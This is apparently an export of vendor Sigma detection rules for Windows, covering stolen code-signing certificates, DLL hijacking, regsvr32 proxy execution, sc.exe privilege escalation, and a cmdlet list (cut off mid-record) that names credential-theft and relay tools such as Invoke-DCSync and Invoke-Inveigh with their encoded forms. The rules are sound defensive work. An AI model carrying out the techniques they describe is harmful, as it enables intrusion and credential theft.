"name": "t1553_002_hacking_team_stolen_cert_process_execution.yml",
"content": "title: Process Executed Signed with Hacking Team Certificate\nid: e07c8f70-5bf0-46b1-8151-7bddc3acca2e\ndescription: |\n Detects the execution of a process signed using one of Hacking Team certificates.\n HackingTeam is an Italian information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations.\n This can be the sign of a malware using a fake signature to evade AV/EDR detection.\n It is recommended to analyze the binary to search for malicious contents.\nreferences:\n - https://blog.talosintelligence.com/old-certificate-new-signature/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2023/07/13\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.StolenCertificate\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint:\n - '2A1DA6DC8635E6C725CCCBE6C035EEC813FBEB2E' # Certum Level III CA - Open Source Developer, William Zoltan\n - '6C5886C0DA723E8B2AEC8C02392D4B175E793EBE' # VeriSign Class 3 Code Signing 2010 CA - HT Srl\n - 'B366DBE8B3E81915CA5C5170C65DCAD8348B11F0' # VeriSign Class 3 Code Signing 2010 CA - HT Srl\n - 'B7C646E3A433986E165BA45B209DA4A2C4111939' # Certum Code Signing CA - Luca Marcone\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e07c8f70-5bf0-46b1-8151-7bddc3acca2e",
"rule_name": "Process Executed Signed with Hacking Team Certificate",
"rule_description": "Detects the execution of a process signed using one of Hacking Team certificates.\nHackingTeam is an Italian information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations.\nThis can be the sign of a malware using a fake signature to evade AV/EDR detection.\nIt is recommended to analyze the binary to search for malicious contents.\n",
"rule_creation_date": "2023-07-13",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e08056f7-9f9e-4eb9-bed2-2d78b6a503ef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081394Z",
"creation_date": "2026-03-23T11:45:34.081396Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081401Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_arp.yml",
"content": "title: DLL Hijacking via arp.exe\nid: e08056f7-9f9e-4eb9-bed2-2d78b6a503ef\ndescription: |\n Detects potential Windows DLL Hijacking via arp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'arp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\snmpapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e08056f7-9f9e-4eb9-bed2-2d78b6a503ef",
"rule_name": "DLL Hijacking via arp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via arp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e090a723-0744-49e2-9bf3-4ff220b193f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079214Z",
"creation_date": "2026-03-23T11:45:34.079216Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079221Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1059.006/"
],
"name": "t1204_001_url_shortcut_via_cmd.yml",
"content": "title: URL Shortcut Created via cmd.exe\nid: e090a723-0744-49e2-9bf3-4ff220b193f1\ndescription: |\n Detects the suspicious creation of a .url shortcut via cmd.\n Attackers can create URL shortcuts to lure users to execute a malicious payload or as a means to establish persistence by, for instance, placing the shortcut in the startup directory.\n It is recommended to analyze the process creating the shortcut as well as the shortcut itself for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1059.006/\ndate: 2024/05/13\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n CommandLine|contains|all:\n - 'echo [InternetShortcut]'\n - 'echo URL='\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e090a723-0744-49e2-9bf3-4ff220b193f1",
"rule_name": "URL Shortcut Created via cmd.exe",
"rule_description": "Detects the suspicious creation of a .url shortcut via cmd.\nAttackers can create URL shortcuts to lure users to execute a malicious payload or as a means to establish persistence by, for instance, placing the shortcut in the startup directory.\nIt is recommended to analyze the process creating the shortcut as well as the shortcut itself for malicious content.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e0973520-fb65-4938-9f52-9eb6a7609f63",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619330Z",
"creation_date": "2026-03-23T11:45:34.619332Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619337Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_unprivileged_user_modifying_service_config_through_sc.yml",
"content": "title: Unprivileged User Modified Service Configuration via sc.exe\nid: e0973520-fb65-4938-9f52-9eb6a7609f63\ndescription: |\n Detects a low integrity user launching sc.exe with specific command-line arguments.\n An unprivileged user can perform privilege escalation by exploiting a service's weak permissions and modifying its configuration through sc.exe.\n It is recommended to investigate the registry keys modified by the sc.exe binary and the \"binPath\" argument to look for paths pointing to malicious content.\n This rule is often triggered by Remote Monitoring and Management (RMM) tools, it is recommended to verify if this is expected in your environment.\nreferences:\n - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/09/07\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.persistence\n - attack.t1574.010\n - attack.t1574.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'sc.exe'\n IntegrityLevel:\n - 'Low'\n - 'Medium'\n\n selection_args_1:\n CommandLine|contains|all:\n - 'config'\n - 'binPath'\n\n selection_args_2:\n CommandLine|contains|all:\n - 'failure'\n - 'command'\n\n condition: selection and 1 of selection_args_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e0973520-fb65-4938-9f52-9eb6a7609f63",
"rule_name": "Unprivileged User Modified Service Configuration via sc.exe",
"rule_description": "Detects a low integrity user launching sc.exe with specific command-line arguments.\nAn unprivileged user can perform privilege escalation by exploiting a service's weak permissions and modifying its configuration through sc.exe.\nIt is recommended to investigate the registry keys modified by the sc.exe binary and the \"binPath\" argument to look for paths pointing to malicious content.\nThis rule is often triggered by Remote Monitoring and Management (RMM) tools, it is recommended to verify if this is expected in your environment.\n",
"rule_creation_date": "2022-09-07",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1574.010",
"attack.t1574.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e09e6a31-8fad-48d4-a795-a6a24020c650",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593134Z",
"creation_date": "2026-03-23T11:45:34.593137Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593144Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_query.yml",
"content": "title: DLL Hijacking via query.exe\nid: e09e6a31-8fad-48d4-a795-a6a24020c650\ndescription: |\n Detects potential Windows DLL Hijacking via query.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'query.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\REGAPI.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e09e6a31-8fad-48d4-a795-a6a24020c650",
"rule_name": "DLL Hijacking via query.exe",
"rule_description": "Detects potential Windows DLL Hijacking via query.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e0a4c001-5e60-4bb3-ad0c-3b39e89483be",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607560Z",
"creation_date": "2026-03-23T11:45:34.607564Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607571Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://twitter.com/pr0xylife/status/1571908774021013504",
"https://twitter.com/Max_Mal_/status/1542461200797163522",
"https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/",
"https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
"https://attack.mitre.org/techniques/T1059/",
"https://attack.mitre.org/techniques/T1218/010/"
],
"name": "t1059_suspicious_execution_of_regsvr32.yml",
"content": "title: Suspicious Direct DLL Execution via Regsvr32\nid: e0a4c001-5e60-4bb3-ad0c-3b39e89483be\ndescription: |\n Detects the direct execution of a DLL through Regsvr32 with a suspicious context (Office applications, renamed DLLs etc.).\n Attackers often use Regsvr32 as a stealthier way to run their DLL payloads.\n It is recommended to investigate the ancestor processes and the contents of the DLL to determine if this action was legitimate.\nreferences:\n - https://twitter.com/pr0xylife/status/1571908774021013504\n - https://twitter.com/Max_Mal_/status/1542461200797163522\n - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\n - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/\n - https://attack.mitre.org/techniques/T1059/\n - https://attack.mitre.org/techniques/T1218/010/\ndate: 2022/09/26\nmodified: 2025/10/27\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059\n - attack.defense_evasion\n - attack.t1218.010\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Regsvr32\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - OriginalFileName: 'regsvr32.exe'\n - Image|endswith: '\\regsvr32.exe'\n\n # Suspicious DLL extensions\n selection_extensions:\n CommandLine|endswith:\n - '.jpg'\n - '.jpeg'\n - '.png'\n - '.gif'\n - '.bin'\n - '.tmp'\n - '.temp'\n - '.txt'\n\n # DLL execution from suspicious folders\n selection_folder:\n CommandLine|contains:\n - '\\AppData\\Roaming\\Microsoft'\n - '\\AppData\\Local\\Temp'\n - '?:\\Users\\Public'\n - '?:\\PerfLogs\\'\n\n # Remote SCT script execution via scrobj\n selection_remote_sct_1:\n CommandLine|contains|all:\n - 'i:'\n - 'http'\n - 'scrobj.dll'\n\n selection_remote_sct_2:\n CommandLine|contains|all:\n - 'i:'\n - 'ftp'\n - 'scrobj.dll'\n\n selection_powershell:\n ParentImage|endswith:\n - '\\powershell.exe'\n - '\\pwsh.exe'\n - '\\powershell_ise.exe'\n\n selection_mshta:\n ParentImage|endswith: '\\mshta.exe'\n\n selection_wscript:\n GrandparentImage|endswith: '\\wscript.exe'\n\n selection_office:\n ParentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n - '\\VISIO.EXE'\n - '\\EQNEDT32.EXE' # related to CVE 2017-11882\n\n exclusion_commandline:\n CommandLine:\n - '?:\\windows\\system32\\regsvr32.exe /* ?:\\Program Files\\\\*.dll'\n - '?:\\windows\\system32\\regsvr32.exe /* ?:\\Program Files (x86)\\\\*.dll'\n - '?:\\Windows\\System32\\regsvr32.exe /* ?:\\WINDOWS\\\\*.dll'\n - '?:\\Windows\\System32\\regsvr32.exe /u /s ?:\\MININT\\Tools\\X64\\TSCore.dll'\n - '?:\\Windows\\System32\\regsvr32.exe /s ?:\\Users\\\\*\\AppData\\Local\\Temp\\Tools\\x??\\Microsoft.BDD.Utility.dll'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Windows\\AdminArsenal\\PDQDeployRunner\\service-?\\PDQDeployRunner-?.exe'\n - '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n - '?:\\Windows\\CCM\\CcmExec.exe'\n - '?:\\Program Files\\Nexthink\\Collector\\Coordinator\\nxtcod.exe'\n - '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\SDCLIENT.EXE'\n\n exclusion_lenovo:\n CommandLine|contains:\n - '?:\\ProgramData\\Lenovo\\ImController\\Plugins\\LenovoBatteryGaugePackage\\'\n - '?:\\ProgramData\\Lenovo\\Vantage\\Addins\\LenovoBatteryGaugeAddin\\\\*\\LenovoBatteryGaugePackage.dll'\n\n exclusion_printing:\n ParentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n - '\\VISIO.EXE'\n - '\\EQNEDT32.EXE'\n CommandLine|contains: 'OnPrinterAccess'\n\n # Microsoft Deployment Toolkit\n exclusion_mdt1:\n ParentCommandLine:\n - '?:\\Windows\\System32\\wscript.exe *\\Scripts\\LTICleanup.wsf'\n - '?:\\windows\\system32\\wscript.exe *\\Scripts\\LiteTouch.wsf'\n CommandLine|contains|all:\n - '\\AppData\\Local\\Temp\\'\n - '\\Tools\\x??\\Microsoft.BDD.Utility.dll'\n exclusion_mdt2:\n ParentCommandLine|contains|all:\n - '\\AppData\\Local\\Temp\\'\n - '\\Tools\\x??\\Microsoft.BDD.Utility.dll'\n CommandLine|contains|all:\n - '\\AppData\\Local\\Temp\\'\n - '\\Tools\\x??\\Microsoft.BDD.Utility.dll'\n\n exclusion_mdt3:\n GrandparentCommandLine|contains: 'wscript.exe *\\Scripts\\LiteTouch.wsf'\n\n exclusion_genapi:\n ParentImage: '?:\\Users\\\\*\\AppData\\Local\\Apps\\\\*\\inot...*\\GenApi.*.exe'\n\n exclusion_nexthink:\n CommandLine: '?:\\Windows\\system32\\regsvr32.exe /s ?:\\Windows\\System32\\wbem\\\\*.dll'\n ParentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage: '?:\\Program Files\\Nexthink\\Collector\\Coordinator\\nxtcod.exe'\n\n exclusion_landesk:\n GrandparentImage|startswith: '?:\\Program Files (x86)\\LANDesk\\LDClient\\sdmcache\\'\n\n exclusion_ivanti:\n GrandparentImage|startswith: '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\sdmcache\\'\n\n exclusion_sccm:\n - Ancestors|contains|all:\n - '?:\\Windows\\ccmcache\\'\n - '|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n - ParentCommandLine|contains: '?:\\WINDOWS\\ccmcache\\'\n GrandparentImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e0a4c001-5e60-4bb3-ad0c-3b39e89483be",
"rule_name": "Suspicious Direct DLL Execution via Regsvr32",
"rule_description": "Detects the direct execution of a DLL through Regsvr32 with a suspicious context (Office applications, renamed DLLs etc.).\nAttackers often use Regsvr32 as a stealthier way to run their DLL payloads.\nIt is recommended to investigate the ancestor processes and the contents of the DLL to determine if this action was legitimate.\n",
"rule_creation_date": "2022-09-26",
"rule_modified_date": "2025-10-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1218.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e0fe5da5-765a-4b7d-9af5-6b711030daa3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296640Z",
"creation_date": "2026-03-23T11:45:35.296642Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296646Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Kevin-Robertson/Inveigh",
"https://gist.github.com/monoxgas/9d238accd969550136db",
"https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1",
"https://github.com/secmode/Invoke-Apex",
"https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts",
"https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1",
"https://github.com/danielbohannon/Invoke-CradleCrafter",
"https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-MicrophoneAudio.ps1",
"https://github.com/AlsidOfficial/WSUSpendu",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_cmd.yml",
"content": "title: Malicious PowerShell Commandlets in Command-line\nid: e0fe5da5-765a-4b7d-9af5-6b711030daa3\ndescription: |\n Detects various malicious commandlets in PowerShell's command-line, generally associated with online repositories containing attack codes to perform memory-only attacks.\n Attackers may use various PowerShell frameworks as they are easily installed and offer a very large panel of interactive functionnalities.\n It is recommended to analyze the executed PowerShell script as well as the ancestors of the host process to determine whether this action is legitimate.\nreferences:\n - https://github.com/Kevin-Robertson/Inveigh\n - https://gist.github.com/monoxgas/9d238accd969550136db\n - https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1\n - https://github.com/secmode/Invoke-Apex\n - https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts\n - https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1\n - https://github.com/danielbohannon/Invoke-CradleCrafter\n - https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-MicrophoneAudio.ps1\n - https://github.com/AlsidOfficial/WSUSpendu\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/03/05\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1562.001\n - attack.t1562.006\n - attack.collection\n - attack.t1125\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_cmdlet:\n CommandLine|contains:\n # Invoke-Inveigh, from Inveigh\n - 'Invoke-Inveigh'\n - 'SQBuAHYAbwBrAGUALQBJAG4AdgBlAGkAZwBoA'\n - 'kAbgB2AG8AawBlAC0ASQBuAHYAZQBpAGcAaA'\n - 'JAG4AdgBvAGsAZQAtAEkAbgB2AGUAaQBnAGgA'\n # Invoke-DCSync, from Monoxgas\n - 'Invoke-DCSync'\n - 'SQBuAHYAbwBrAGUALQBEAEMAUwB5AG4AYw'\n - 'kAbgB2AG8AawBlAC0ARABDAFMAeQBuAGMA'\n - 'JAG4AdgBvAGsAZQAtAEQAQwBTAHkAbgBjA'\n # Invoke-InveighRelay, from Inveigh\n - 'Invoke-InveighRelay'\n - 'SQBuAHYAbwBrAGUALQBJAG4AdgBlAGkAZwBoAFIAZQBsAGEAeQ'\n - 'kAbgB2AG8AawBlAC0ASQBuAHYAZQBpAGcAaABSAGUAbABhAHkA'\n - 'JAG4AdgBvAGsAZQAtAEkAbgB2AGUAaQBnAGgAUgBlAGwAYQB5A'\n # Invoke-PsExec, from HarmJ0y\n - 'Invoke-PsExec'\n - 'SQBuAHYAbwBrAGUALQBQAHMARQB4AGUAYw'\n - 'kAbgB2AG8AawBlAC0AUABzAEUAeABlAGMA'\n - 'JAG4AdgBvAGsAZQAtAFAAcwBFAHgAZQBjA'\n # Invoke-SSHCommand, from Post-SSH\n - 'Invoke-SSHCommand'\n - 